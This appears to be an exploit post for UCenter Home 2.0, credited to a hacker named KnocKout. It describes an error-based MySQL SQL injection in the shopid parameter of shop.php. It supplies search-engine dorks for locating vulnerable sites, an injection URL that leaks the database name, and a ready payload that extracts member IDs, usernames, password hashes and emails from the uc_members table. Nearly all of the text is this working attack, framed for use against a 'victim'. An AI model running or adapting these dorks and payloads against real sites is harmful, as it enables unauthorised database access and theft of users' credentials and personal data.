__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout

*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers

*/ Contact: knockoutr@msn.com

*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home

Version : 2.0

Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view

Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php

value's : (?)ac=view&shopid=

Vulnerable Style : SQL Injection (MySQL Error Based)

Need Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim database name.

for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

..

DB : Okey.

Edit the DB : `[TARGET DB NAME]`

Example : 'hiwir1_ucenter'

Edit : Okey.

Use hex conversion and edit your SQL injection exploit..

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1